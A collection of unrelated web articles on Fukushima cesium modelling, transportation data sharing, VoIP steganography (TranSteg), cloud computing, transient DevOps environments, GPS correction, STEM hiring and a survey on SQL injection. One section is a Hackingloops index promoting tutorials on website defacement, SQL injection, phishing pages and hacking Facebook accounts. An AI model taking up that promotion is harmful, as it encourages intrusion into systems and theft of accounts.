Significant amounts of radioactive materials were released to the atmosphere from the Fukushima Daiichi nuclear power plant after the accident caused by the major earthquake and devastating tsunami on March 11, 2011. Accurate and efficient prediction of the distribution and fate of radioactive materials eventually deposited at the surface in the Fukushima area is of primary importance. In order to make such a prediction, it is important to gather information regarding the main migration pathways for radioactive materials in the environment and the time dependences of radioactive material transport over the long term. The radionuclide of most concern in the Fukushima case is radioactive cesium. Previous surveys indicate that the primary transportation mechanisms of cesium are either soil erosion and water transport of sediment-sorbed contaminants or transport of dissolved cesium in the water drainage system such as by rivers. A number of mathematical models of radioactive contaminants, with particular attention paid to radiocesium, on the land and in rivers, reservoirs, and estuaries in the Fukushima area are developed. Simulation results are examined while simultaneously implementing field investigations. For example, the orders of magnitude of the radiocesium concentration on the flood plain of the Ukedo River by model prediction and field investigation results were both 105 Bq/kg. Microscopic studies of the adsorption/desorption mechanism of cesium and soils have been performed to shed light on the mechanisms of macroscopic diffusive transport of radiocesium through soil. The maximum exchange energy between cesium and prehcated potassium in the frayed edge site was simulated to be 27 kJ/mol, which reproduces the corresponding value previously achieved by experiments. These predictions will be utilized for assessment of dose from the environmental contamination and proposed countermeasures to limit dispersion of the contaminants. Source | <urn:uuid:0acfe06d-5d87-4e99-8ab1-4a2ca79a9767> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/geological-isolation-research-and-development-directorate-2637423/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00618-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.898448 | 429 | 2.78125 | 3 |
When it comes to transportation, the United States is No.1. We have more miles of highway and railroad, we drive more miles in our vehicles, and we fly more passengers in our airplanes than any other country in the world.
The transportation market is a $600 billion industry, according to BizStats.com, with the public sector contributing vast sums. For example, in 2005, the Census Bureau reported that federal, state and local governments spent $66 billion on roads. And according to the American Public Transportation Association, public transportation is a $27 billion industry.
Also in 2005, state and local governments spent $1.8 billion on transportation IT systems, according to INPUT. By 2009, IT spending will have increased to $2.5 billion. Meanwhile the federal government has proposed spending $2.7 billion on transportation-related IT projects in fiscal 2007.
While it's hard to envision the vast number of IT projects taking place in the transportation industry, it is even harder to imagine an overall strategy for sharing data between the various levels of government. Repeated requests to the U.S. Department of Transportation's Office of the CIO for an overview of its data sharing strategy were unanswered.
But in reality, a lot of sharing is going on. Many agencies at the federal, state and local levels are working on individual projects to integrate information at different levels of government, or across jurisdictions at the same level. They are also working to improve data sharing between transportation and law enforcement, as well as between environmental protection and other disciplines.
Data on Changing Conditions
As acting strategy manager for the government practice at SAS, a business analytics software firm, Alyssa Alexander works with many transportation departments. She observed that state departments of transportation (DOTs) are increasingly sharing data on road conditions through statewide geographic information councils and plotting the data into map displays. The GIS shop can code the maps to indicate where the roads are in the best and worst condition due to construction projects. The DOTs also analyze stretches of highway to predict which are likely to see more accidents because of construction.
"They're making sure public safety officers are aware of changes in road conditions so that they're able to respond quickly to traffic incidents if there's a higher likelihood," Alexander said, adding that the DOTs are trying to develop better mechanisms for routing this road condition data through their GIS departments and to the public safety departments.
Safety research -- particularly concerning incident tracking -- is one of the priorities in transportation data sharing, according to Alexander.
State departments of public safety normally collect incident-related data. "They must communicate the appropriate data points into the department of transportation, so that at a planning level, the department of transportation can improve the safety of a particular intersection or the speed along the roadway," she said.
SAS has been working with clients on systems for collecting incident data, as well as Web presentations, Alexander said. "The Web sites that provide this information through static reports or ad hoc queries are the ones we see a lot more of. They're in development, and there's some grant funding from the Federal Highway Administration (FHWA) to support those types of programs."
Efforts to share incident data, and many other data sharing initiatives, could get a major boost from a program to develop sets of extensible markup language (XML) schemas for transportation. Government and industry participants recently completed a project, funded by the National Cooperative Highway Research Program, which is sponsored by state DOTs and the FHWA, to define TransXML data exchange formats for applications in four areas: survey/roadway design, transportation construction/materials, highway bridge structures and transportation safety.
Participants hope the TransXML framework will eventually cover many more disciplines. "They have planned interfaces for public safety, rail, local transit, ferries, accounting and aerospace applications," Alexander said.
TransXML is intended to be a one-stop shopping umbrella that covers the transportation industry, said Steve Brown, applications development manager at the Nebraska Department of Roads (NDOR)."But it's still in its infancy." A self-proclaimed "data sharing/XML evangelist," Brown serves on the technical applications architecture task force of the American Association of State Highway and Transportation Officials -- a committee that played a major role in writing the project's proposal.
Like any XML framework, TransXML provides a way to exchange data among different software applications, even those not designed to be interoperable. With schemas already in place for exchanging data on transportation safety, local law enforcement agencies using a variety of systems to record data on highway crashes could easily submit that information to a state transportation department. "We can then keep it centrally, so we can do our hazardous location analysis, safety analysis, and then make that available -- all of our data -- back to the local law enforcement if they're interested in utilizing it," Brown said. The state could also send the collected data to federal agencies without worrying about data format requirements.
Hopefully, Brown said, officials at the NDOR will start using TransXML in the next 18 months.
Some other applications for TransXML will have to wait until more schemas are developed. Local governments could use it to store information about tax lots and landowners, and submit it to the states. "We can use it when we buy right of way, when we permit, when we do access control," Brown said. "Then all that information can be submitted nationally, hopefully, for census and other land management uses."
In long-haul trucking, TransXML could streamline the process of obtaining oversized/overweight permits. Today, if a truck needs to haul an oversized or overweight load across several states, the trucking company or its agent must apply separately to each state the load will cross. With TransXML formats, the company could apply once and then submit that one application to each state, paying the necessary fees and getting the permits in one transaction, Brown said.
TransXML could also help governments cooperating on cross-border highway facilities. When Nebraska works with Iowa or South Dakota on a road with a cross-border bridge, Brown said, road and bridge design is a collaborative and cooperative effort using their respective systems. Using TransXML, the states can create a single transportation system model, "even though it's designed with different software, with different teams, with different people."
The same principle applies when the state builds a highway that crosses city or county lines, he said.
While the group has achieved its goal of developing and demonstrating TransXML schemas in the four defined areas, as of March it had still not completed one important task -- finding an organization to take long-term ownership of TransXML and keep the initiative going. "If there is no long-term owner and keeper, it falls apart," Brown said.
Road Maps and GIS Intersect
Many data sharing arrangements that involve transportation focus on GIS. The Tucson, Ariz., DOT (TDOT) has been exchanging GIS files with Pima County and other members of the Pima Association of Governments since the 1990s.
Transportation agencies started by making a variety of digital maps on their Web sites available to anyone in the public or private sectors. Local governments also continue to share data via TDOT's maps and records server. "We pass orthophotography around like it was candy," said Ron Platt, IT manager of the TDOT. Since all the participants use GIS software from ESRI of Redlands, Calif., there are no compatibility issues, he said.
One county project that uses GIS data from TDOT is the Sonoran Desert Conservation plan, a land-use planning project to protect the desert's habitat. Many of the washes -- stream beds that contain no water -- have been digitized off the orthophotography and shared with the county, Platt said.
GIS is also the focus of a project in the state of Washington that will involve data integration with other departments. The effort comes as part of a project to replace many of the critical information management systems at the Washington State DOT (WSDOT). The plan is to tie the new systems -- for managing highway construction, finance and a host of other activities -- to the WSDOT's GIS tools, and add a geographic dimension to the information.
"When you're trying to make a decision on what investments have been made or need to be made in an area, you can call up everything from engineering drawings to financials" connected with any project on the map, said David Hamrick, WSDOT's CIO. The agency plans to include data layers provided by the state Department of Natural Resources and other departments that own assets across the state, he said.
In another sharing initiative, Washington state is working with Oregon and local governments within the two states on a Web-based trip planning system, which Hamrick described as almost like a MapQuest for public transportation. When the system is complete, "you can go in and say, 'I need to get from Spokane to this address in Portland,' and it will map all the possible public transportation methods you can use to get there," he said.
Each transportation authority will continue to maintain its own schedule data. Initially authorities will have to periodically upload fresh schedules to keep the integrated system up to date. "In a future phase, we'll start looking at connections to be able to just automatically update from local systems," Hamrick said.
Commercial Drivers, Problem Drivers
For years, state motor vehicle departments have shared data on commercial drivers through the Commercial Driver License Information System (CDLIS), operated by the American Association of Motor Vehicle Administrators. Each state maintains CDL data in its own management system, and the CDLIS operates as a "pointer system," said Barry Goleman, specialist leader for the transportation and motor vehicle practice at Deloitte Consulting in Sacramento, Calif. When an employee at a DMV in one state makes a query about a commercial driver, the system can see who has licensed that driver and route the request to that state.
If a truck driver from Florida applies for a CDL in New York, for example, the DMV will query the system to make sure the license is on record in Florida, and that the driver has only one license record, Goleman said. When New York issues the license, the record is electronically transferred to Florida. "And if that driver subsequently gets a traffic conviction in Illinois, after that conviction is processed, Illinois electronically routes that to New York for posting on his home state driver record," he said.
The U.S. DOT's National Highway Transportation Safety Administration operates a parallel system for noncommercial drivers' licenses. Called the National Driver Register (NDR), it allows motor vehicle officials in one state to check DMV databases in other states before issuing new licenses, Goleman said.
"That prevents somebody who has a Maryland license and gets suspended for drunken driving from going across the border to Virginia and saying, "'I've never had a license before; I want to get a license here; I've just moved here,'" Goleman said. Like the CDLIS, the NDR uses a federated data system; each state maintains its own data, but other states' DMVs can access the information as needed.
Other transportation agencies also query the NDR to obtain driver license data for activities that they regulate: the Federal Aviation Administration for airman medical certification; the Federal Railroad Administration for locomotive operators; the Coast Guard for merchant marines and servicemen; and the National Transportation Safety Board and Federal Motor Carrier Safety Administration for accident investigations.
Had the system been available in 1989, it might have averted the Exxon Valdez disaster, Goleman said. The oil tanker's captain, Joseph Hazelwood, had been arrested several times for drunken driving. "They check all their maritime certificates against this database to look for people who have a history of those kinds of convictions." | <urn:uuid:30b07ce3-5caf-4ddf-8e20-2d558132c553> | CC-MAIN-2017-09 | http://www.govtech.com/featured/The-Integration-Highway.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00318-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94914 | 2,452 | 2.578125 | 3 |
A group of researchers from the Institute of Telecommunications of the Warsaw University of Technology have devised a relatively simple way of hiding information within VoIP packets exchanged during a phone conversation.
They called the method TranSteg, and they have proved its effectiveness by creating a proof-of-concept implementation that allowed them to send 2.2MB (in each direction) during a 9-minute call.
IP telephony allows users to make phone calls through data networks that use an IP protocol. The actual conversation consists of two audio streams, and the Real-Time Transport Protocol (RTP) is used to transport the voice data required for the communication to succeed.
But, RTP can transport different kinds of data, and the TranSteg method takes advantage of this fact.
“Typically, in steganographic communication it is advised for covert data to be compressed in order to limit its size. In TranSteg it is the overt data that is compressed to make space for the steganogram,” explain the researchers. “The main innovation of TranSteg is to, for a chosen voice stream, find a codec that will result in a similar voice quality but smaller voice payload size than the originally selected.”
In fact, this same approach can – in theory – be successfully used with video streaming and other services where is possible to compress the overt data without making its quality suffer much.
To effect the undetected sending of the data through VoIP communication, both the machine that sends it and the one that receives it must be previously configured to know that data packets marked as carrying payload encoded with one codec are actually carrying data encoded with another one that compresses the voice data more efficiently and leaves space for the steganographic message (click on the screenshot to enlarge it):
The method is efficient in sending and receiving the data, but in order to be considered good enough to use, it must be undetectable by outside observers.
According to the paper, the first thing can be accomplished whether VoIP phones or intermediate network nodes are used by one or both participant in the conversation, but the second one only if two VoIP phones are the sending and receiving nodes, since there is no change of format of voice payloads during the traversing of the network. | <urn:uuid:106ee860-0b28-45b5-b2d5-880c46025b08> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2011/11/15/hiding-messages-in-voip-packets/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00318-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940024 | 468 | 2.796875 | 3 |
What Is Cloud Computing
What is cloud computing you ask? The concept may seem nebulous or hard to decipher but in reality is very simple and compelling. It provides a cost effective solution, especially to IT professionals who can now reap the benefits provided by cloud computing without having to spend exorbitant amounts of cash on providing software, hardware and other services in their business model. Traditional business structures prior to the advent of cloud computing concept had to face these problems as the above mentioned services had to be delivered to each member of the team. The whole process was very complicated, painstakingly tedious and placed a huge burden on financial resources. These applications then had to be configured and maintained to ensure that the system ran smoothly and everyone had flawless and uninterrupted access to the services.
Cloud Computing Definition
Cloud computing eliminates all these issues and delivers a viable adaptation that allows businesses to use the internet as a backbone to provide applications and handle the flow of data. Central servers are deployed by vendors that manage and troubleshoot software upgrades and services. These servers and data storage units are the basic components of the cloud where these services are administered. Protocols implemented in these servers are usually called middleware. These protocols ensure that the all the computers present in the network can communicate with each other and services are provided throughout the model. Users can then access these services by simply accessing the internet to login into their account which exists in the central server and engage in their prospective tasks without having to install any software or service on their personal machine. This is highly efficient and adequate as all the memory and processing is centralized instead of being localized. The workload of the whole model in general also becomes centralized which reduces the dependency on local machines for running applications and services. The user becomes mobile and can use any workstation with a working internet connection for admission into the network.
Since a cloud computing network will potentially handle an abundance of users, it also has the capability to provide sufficient storage space for data that needs to be saved. Also, it saves physical space as the date stored is present in the cloud, not on drives or local servers which take up space in case of offices. Often, redundancy is also put into practice as functionality. This provides a backup for the data stored so that in case of a server crash, vital user information is preserved and remains intact.
Next Week – Part 2: Community, Private, Public, Hybrid Clouds…
By Chuck Weaver | <urn:uuid:85560f06-713d-4d1e-a46b-4c6f8409f16c> | CC-MAIN-2017-09 | https://cloudtweaks.com/2011/11/what-is-cloud-computing-yes-another-perspective-part-1/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00018-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.960883 | 487 | 3.28125 | 3 |
Critics of Voice over Internet Protocol (VoIP) site that VoIP programs lack security. However, with recent advancements in the telecommunications industry, this is now a claim of the past. All VoIP systems can be individually customized based on a company’s security requirements. For example, the main security issues with VoIP surround a company’s implementation of the system, not the system itself. If traditional networking security is applied to VoIP business systems, VoIP is as secure as any other type of protocol on the market. Originally, when VoIP was introduced to the public, hacking and security were not at the forefront of developer’s minds. As with any type of technology product, years of consumer use and research have helped to create a far more advanced product than what was originally released. As with all products, the more popularity they gain, the more scrutiny they are subject to. Many security issues can be easily resolved by removing the codes for unused VoIP features and performing regular security audits on commonly used features. Most importantly, companies need to define their security requirements ahead of time. Financial institutions and government agencies require higher confidentiality requirements and may require additional, advanced encryption. Implementing the proper tools before switching to VoIP hosted programs helps companies assess all costs up front and prevents any form of cyber attacks from occurring. Some technology experts adamantly maintain that business VoIP systems are in fact, more secure than traditional telecommunication phone systems. Their opinions are backed by statements that highlight how IP systems can install added security that traditional telephone systems cannot. They claim that the vulnerability for VoIP systems occurs when companies neglect to install proper security and IP safety protocols. VoIP services constantly have a telephone tone available, leading to consistent reliability and allowing companies to receive and make calls to customers and clients. One of the top VoIP security threats is when a company neglects to turn on Internet security because they feel it is overly complicated and they do not take the time to ensure their system is adequately protected. Companies that switch to VoIP do so because integrating data and voice plans into one network helps decrease operating expenses and boosts productivity, something that traditional telecommunication services lack. As with all popular products, the more people that use them, the more security risks they are exposed to with hackers. Taking the proper security measures can eliminate these threats, allowing companies to take full advantage of modern VoIP features and systems. | <urn:uuid:b18f5435-f1af-4f96-8c4a-c0b4df92cde2> | CC-MAIN-2017-09 | http://jive.com/blog/verifying-voip-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00438-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.958358 | 484 | 2.640625 | 3 |
In economics, scarcity is the fundamental problem of "having humans [with]... unlimited wants and needs in a world of limited resources" (see Resources). When resources are scarce, people compete for access to them. Competition for resources is evident when it comes to people getting access to environments on traditional software projects.
The beauty is that thanks to hardware commoditization, virtualization, and cloud computing, this competition can be greatly diminished when the appropriate patterns and practices — such as transient environments — are used on a project. Transient environments are short-lived environments that are terminated on a frequent basis. To be clear, the scarcity never vanishes, but you experience the illusion of infinite capacity. When applying the transient environment pattern, you'll start forgetting that it's even an illusion.
Sometimes, you'll hear these types of environments referred to by other names, including ephemeral, temporal, temporary, and disposable. These all mean essentially the same thing — that nonproduction environments are as short-lived as possible. Lately, my company has been recommending that they last no more than 72 hours — and that's on the high end.
One of the more challenging problems in software development occurs when teams have fixed instances that no one else can alter. Often, this happens because the environment took days, weeks, or months to configure. This is an antipattern that occurs because no one took the time to script the creation of the environment. Thus, environments are scarce resources, and the competition for them is fierce. When environment lease policies do exist, they are often ignored, or the lease deadlines are extended multiple times.
Most projects I've seen don't have environment lease policies — or they are very loosely defined and often violated. For the ones that do have lease policies, environments require the manual installation of tools, data, and configuration — after the environment has been created. This makes each and every environment unique and, therefore, more difficult to manage, because hundreds of environments might get provisioned on larger enterprise projects. In that case, there's no simple approach to getting back to a baseline for the environment. Moreover, no team member knows how to get it back to that baseline state. As a result, team members become reluctant to terminate — or even modify — these environments. This antipattern makes it prohibitively more expensive to create and terminate environments.
With transient environments, all environments are ephemeral except for production (although there are effective ways to make production environments ephemeral too). Although this might vary by project, the heuristic is that these environments exist for only enough time to run through a suite of automated and exploratory tests. The key prerequisites for transient environments is that they be scripted, tested, and versioned. Ideally, you should be using an infrastructure automation tool such as those I discuss in "Agile DevOps: Infrastructure automation."
The key features that make up transient environments are:
- Scripted environments: They are fully scripted, versioned, and tested.
- Self-service environments: Any authorized person on the team can launch a new environment.
- Automatic termination: Environments are automatically terminated based on the team policy. Team members have no option to override the policy.
Once you have a fully scripted environment, you can enable authorized team members to obtain it in a self-service manner. With the freedom to simply launch and terminate environments on demand comes responsibility. This responsibility is reinforced by defining termination policies and enforcing those policies through automated processes that terminate the environments on a regular basis. (I will cover test-driven infrastructures and versioning in future articles in this series).
By defining transient-environment policies and automating the implementation of those policies on your projects, you can reduce the proliferation of unique environments, support self-service deployments, increase automation of environment instantiation, move toward a culture of environments as commodities, allow for test isolation, and significantly reduce the amount of troubleshooting in environment-specific problems. Some of the key benefits are:
- Reduce environment dependency: Reduce the dependency that your team has on any one particular environment by providing the capability to launch and terminate them at will.
- Better resource utilization: By terminating environments that are no longer being used, you free up capacity for others.
- Knowledge transfer: When team members know that their environments will be terminated on specific times, automation becomes the only solution to the institutional knowledge of how the environment gets configured.
How it works
The nice thing about transient environments is that it's a rather simple pattern to implement once your environments are fully scripted, versioned, and tested. At that point, you have three primary tasks to perform:
- Create a team policy: In collaboration with your team members, determine your team policy based on your project requirements. I recommend starting aggressively and regularly reducing the number of hours these environments live — to about 72 hours.
- Automate environment termination: Write a script that terminates all environments that exceed the team lease policies.
- Schedule environment termination: Schedule a process to run on a regular basis that executes the environment-termination script.
Base your team policy on the time it takes to run through all of the required testing.
To schedule environment termination, you can start by using a scheduler
cron or — if you're using Java — Quartz
(see Resources). You can also use the scheduler
provided by your Continuous Integration server to run a job at a regular
time every day. This example shows a simple
that runs a script once a day at 2:15 a.m.
0 15 02 * * /usr/bin/delete_envs.sh
The next example uses the command-line interface provided by Amazon Web Services (AWS) CloudFormation to terminate an environment as defined by a CloudFormation stack:
/opt/aws/apitools/cfn/bin/cfn-delete-stack --access-key-id $AWS_ACCESS_KEY \ --secret-key $AWS_SECRET_ACCESS_KEY --stack-name $current_stack_name --force
A script like this can be expanded to loop through an environment catalog and terminate all associated resources.
By defining an aggressive team policy, scheduling a process, and automating the termination of environments, your team can proactively manage resources and reduce the chance that environments the project relies upon exist for weeks or months.
How does environment troubleshooting usually work on most projects? In my experience, it's a painful slog of determining what got changed, who changed it, and why. Often, several people investigate the problem to determine the proper remedy. The problem is often replicated because each environment is unique — because unique modifications are made to it as it runs for weeks or months.
Alternatively, with a transient-environment policy — based upon scripted, versioned, and tested environments — you get the environment into a known state. To do this, you launch a new environment and apply changes to determine its effect. Then, you write automated tests and scripts and then version the changes. Because effective change management is in place, you can always get back to a known state to make changes, rather than wasting hours or days determining what got changed in a dynamic environment modified by myriad users. This is the essence of having a canonical environment.
A transitory stay
In this article, you learned that agile DevOps environments are as short-lived as possible — as little as a few hours and as much as a few days. By defining a policy and scheduling automated termination of environments, you reduce the dependency on a limited number of unique environments, better utilize resources, and encourage automation so that environments can be launched and terminated on demand.
In the next Agile DevOps installment, you'll learn about creating an environment that fails constantly — paradoxically, for the purpose of preventing failure. In it, I'll cover Chaos Monkey, a tool developed by the Netflix tech team that intentionally and randomly, but regularly, terminates instances in the Netflix production infrastructure to ensure that the systems continue to operate in the event of failure.
- Scarcity: Wikipedia describes economic scarcity.
- "Automation for the people: Deployment-automation patterns, Part 2" (Paul Duvall, developerWorks, February 2009): Read about the "Disposable Container" pattern for deployments.
- "Servers fail, who cares?": Gregg Ulrich of Netflix describes how Netflix doesn't rely on any one environment to stay running.
- Stay current with developerWorks technical events and webcasts focused on a variety of IBM products and IT industry topics.
- Attend a free developerWorks Live! briefing to get up-to-speed quickly on IBM products and tools as well as IT industry trends.
- Follow developerWorks on Twitter.
Get products and technologies
- Quartz: Quartz is an open source job-scheduling service.
- IBM Tivoli® Provisioning Manager: Tivoli Provisioning Manager enables a dynamic infrastructure by automating the management of physical servers, virtual servers, software, storage, and networks.
- IBM Tivoli System Automation for Multiplatforms: Tivoli System Automation for Multiplatforms provides high availability and automation for enterprise-wide applications and IT services.
- Evaluate IBM products in the way that suits you best: Download a product trial, try a product online, use a product in a cloud environment, or spend a few hours in the SOA Sandbox learning how to implement Service Oriented Architecture efficiently.
- Get involved in the developerWorks community. Connect with other developerWorks users while exploring the developer-driven blogs, forums, groups, and wikis.
- The developerWorks Agile transformation community provides news, discussions, and training to help you and your organization build a foundation on agile development principles. | <urn:uuid:e9c75815-2abf-4015-a884-d9bb2540f76d> | CC-MAIN-2017-09 | http://www.ibm.com/developerworks/java/library/a-devops3/index.html?ca=drs- | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00438-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.925004 | 2,018 | 2.546875 | 3 |
Website Hacking means altering or manipulating the website content or database i.e. manipulate website contents say CSS or Javascipts, leak its users database, corrupt its database, deface the website’s index page, exploit the anonymous login and much more… Hacking websites is nowadays became a fashion among the Hackers. They hack the website and deface its index page to display their own custom defaced page, mostly for popularity. There are several website Hacking techniques like Injection attacks i.e. SQL Injection, Command Injection, Local File Inclusion injection, XPath Injection, arc injection, Cross site scripting attacks, Cross site scripting forgery attacks, Header manipulation, hacking root directories, bypassing registration, unblocking websites, Hacking premium accounts, Cookie based attacks, domain hijacking and much more involved in achieving above mentioned goals.
Hackingloops listed all the Website Hacking articles posted on Hackingloops till date. So learn how to Hack websites or Website Hacking.
Website Hacking Articles:
- 10 step guide to prevent SQL injection
- Hacking websites SQL injection tutorial
- 6 Ways to Hack or deface Websites Online
- Advanced Persistant Threat Analysis with Network traffic Analysis
- Hack websites using Command Injection
- Hacking Websites using SQLMAP | HackingLoops Tutorials
- Hacking websites using Directory Traversal Attacks | Hackingloops
- How to Hack Facebook account or password
- How to access blocked sites or country restricted sites
- How to bypass registration on forums to view content
- How to hack facebook account password Hackingloops
- How to make a Phisher or Fake Pages
- Unblock torrent websites in India on Airtel | MTNL
- XPath Injection Tutorial to Hack Websites Database
- How to Deface Websites using SQL and Php scripting?
- How to hack a Website or websites database
- How to hack websites by Remote File Inclusion
- SQL Injection tutorial to Hack websites
- Domain Hijacking – How to Hijack Domain Names
- How to Hack Cyberoam 100% working hack
- The Null Byte Hack : Extreme HacK for sites which have uploading avtar and picture Facility. | <urn:uuid:13aff9d4-c1df-4e21-a513-62fa62027f79> | CC-MAIN-2017-09 | https://www.hackingloops.com/website-hacking-learn-how-to-hack-websites/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00438-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.81666 | 469 | 2.578125 | 3 |
Juniper app works to correct GPS errors
- By John Breeden II
- Oct 03, 2013
Government workers who frequently use GPS applications know both their strengths and limitations. While the system is accurate down to about two or three meters, sometimes that isn't good enough. And when natural or manmade structures skew the signal, readings can tend to drift off course even more.
Juniper Systems, which makes rugged GPS devices aimed at the professional and government markets, has created a free Global Navigation Satellite System app that works with its rugged Mesa Geo notepad to analyze and compensate for most GPS errors.
"Large trees or buildings can change the signal" of most GPS devices, said Katelyn Heiner, a marketing specialist for Juniper. When the device tries to compensate for changing signals, that can lead to errors, she said.
The Juniper app lets users tell their devices what kind of activity they are performing, which prompts the GPS receiver to try and figure out the user’s actual position when a signal is corrupted by objects. One setting, for example, works best for people who are walking with their devices – the system will assume a very low acceleration, so it won't indicate that people are farther away from the last known location than they could reasonably walk. Another mode is for use in a vehicle, which can use some dead reckoning technology to estimate positions that might be quite a distance horizontally from where the user started out, but probably about the same spot vertically. There is even an At Sea mode that assumes no vertical change in position, but which allows for quite a lot of horizontal movement.
Probably one of the most useful modes introduced by the app is called Static Hold. Users would choose this setting when they are planning to stand still for a long period of time, or if the device itself is placed in one spot. It sets the navigation algorithm's velocity to zero along both the horizontal and vertical axis, and it will remain stable until evidence of movement is detected.
Natural resources marketing manager Trevor Brown helped create the app for Juniper and tested it extensively in the field. "Juniper does a lot of work creating hardware that minimizes noise and allows users to get a better signal," he said. "What we've done with this app is to also let the software help make things more accurate."
Brown said that using a GPS is a dynamic process, in which up to eight satellites can be sending data to receivers. Interpreting all those signals is what makes a GPS device accurate to within, say, two meters or four meters. But when a signal bounces off trees or has to pass through buildings, it can become slightly corrupted, and the device can misinterpret its location.
"Where this actually becomes important is when people are using a GPS in a non-optimized environment," he said, which is anything other than a totally open sky. "What the software does is to eliminate outliers it gets in the data based on what users are doing. So if they are just walking with their device and a signal comes in that's 12 meters away from the others, it will discount that when it estimates its position."
Juniper explains all the new modes and algorithms in an extensive paper.
Improving GPS signals is goal of anyone who needs precise location information. That often means following common-sense practices and learning how to properly set up and use a device. Juniper’s app takes refining the process a step further.
John Breeden II is a freelance technology writer for GCN. | <urn:uuid:01e45f9f-fe55-45ab-a524-f3dbdca1c556> | CC-MAIN-2017-09 | https://gcn.com/articles/2013/10/03/juniper-systems-navigation-app.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00314-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961103 | 717 | 2.71875 | 3 |
Late last month, the National Academy of Engineering and National Research Council released a report that recommended the Defense Department overhaul its recruiting and hiring practices in order to effectively compete for critical workers in the science, technology, engineering and mathematics fields.
While that report put more emphasis on the quality of STEM candidates, a new report released Tuesday by the American Council for Technology and the Industry Advisory Council’s Institute for Innovation focuses on the challenges federal agencies and industry face on the front end -- the quantity of STEM candidates.
While scientific innovation produces roughly half of all U.S. economic growth, the educational pipeline necessary to fill STEM jobs and make that economic growth possible is not readily up to task, the report noted. For example, the United States ranked 14th in reading, 17th in science and 25th in mathematics based on an international assessment of 15-year-olds in 70 countries. Inadequate early education is the start to this negative trend, as many students never make it into the STEM pipeline.
In addition, jobs in STEM fields are increasing three times faster than jobs in the rest of the economy, yet American students are not entering these fields in sufficient numbers. That means that by 2018, the nation faces a projected shortfall of 230,000 qualified advanced-degree STEM workers, a problem that is compounded by the large number of Baby Boomer retirements, ACT-IAC found.
Several STEM initiatives, such as the Committee on STEM Education, already exist, but most of the funding for these programs is targeted toward the needs of specific agencies, the report noted. Of the $3.4 billion spent on STEM education, only $312 million is targeted toward improving teacher effectiveness, and only $396 million invests in K-12 education.
The report offers three recommendations for addressing the shortage of STEM candidates:
- Focus federal leadership on STEM education activities by establishing a national challenge for STEM that includes increased public awareness campaigns, improved coordination efforts, innovative grant and tax incentive programs, and calls more urgency to the STEM problem.
- Create a permanent STEM education committee that focuses on coordinating all of the various STEM initiatives and establishing clear methods for measuring the outcomes of federal STEM initiatives.
- Provide universal access to a broadband digital infrastructure and provide the tools, training and devices to improve digital literacy.
“The workforce shortage in the areas of [STEM] is a silent national crisis. ‘Silent’ because it has not received the national focus it deserves,” the report states. “Many -- if not most -- Americans think of the United States as a leader in STEM education and jobs, but this is not true. We are quietly slipping further and further behind because we have not developed a culture that prioritizes STEM.” | <urn:uuid:4917bfad-12ba-4c15-bf25-5a72421212bd> | CC-MAIN-2017-09 | http://www.nextgov.com/cio-briefing/wired-workplace/2012/11/stem-recruiting/59557/?oref=voicesmodule | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170380.12/warc/CC-MAIN-20170219104610-00134-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.944745 | 559 | 2.578125 | 3 |
On Wednesday, the Ponemon Institute released the results of a new study conducted for DB Networks. In it, 65 percent of the respondents said that they've experienced one or more SQL Injection attacks in the last 12 months. In addition, each incident took an average of 140 days to discover, and 68 days to fix the issue.
"It is commonly accepted that organizations believe they struggle with SQL injection vulnerabilities, and almost half of the respondents said the SQL injection threat facing their organization is very significant, but this study examines much deeper issues," commented Dr. Larry Ponemon.
But there's a problem.
When it comes to preventing SQL Injection, those who took part in the study said that protective measures are lacking, and 52 percent of the respondents said they don't take any precautions, such as code audits and validation checks.
Yet, as mentioned, nearly half of the respondents said that SQL Injection attacks are a significant threat. Moreover, 42 percent said that they believed that SQL Injection is a contributing factor in most breaches.
The lacking prevention can be explained in part because only 31 percent of the respondents say their organization's security / IT teams possess the skills, knowledge, and expertise to detect an SQL Injection attack.
The sample size for this study was small, only 595 respondents across 16 verticals. However, the problem of SQL Injection isn't so small; in fact, this problem has existed since 1998.
Part of the reason SQL Injection exists is because on the criminal's end, it works. There are several tools on the Web that automate SQL Injection, from scanning for vulnerable hosts, to harvesting data from the database - and for most criminal's that's the only thing they need to compromise data.
For businesses, the issue is a bit more complex. Developers are paid to code, but security still isn't a primary function when a project needs to be delivered on time and under budget.
Code development has come a long way since 1998, but things still slip through the cracks. Those small mistakes that fall between the cracks are the same mistakes that turn into large breaches. This is why code assessments and continual monitoring of applications and data bases is encouraged, or outright mandated.
Still, SQL Injection happens with regularity, and the aftermath of those incidents can be costly and embarrassing (in a PR sense). Obviously, DB Networks has a horse in the race when it comes to preventing SQL Injection, but so do several other vendors. But the basics can often solve the most basic SQL Injection issues, such as those outlined by OWASP.
Still, no matter how your organization deals with SQL Injection, the important part is that it's addressed. It isn't easy, but given the value placed on data, both inside and outside of the company, it's worth the effort.
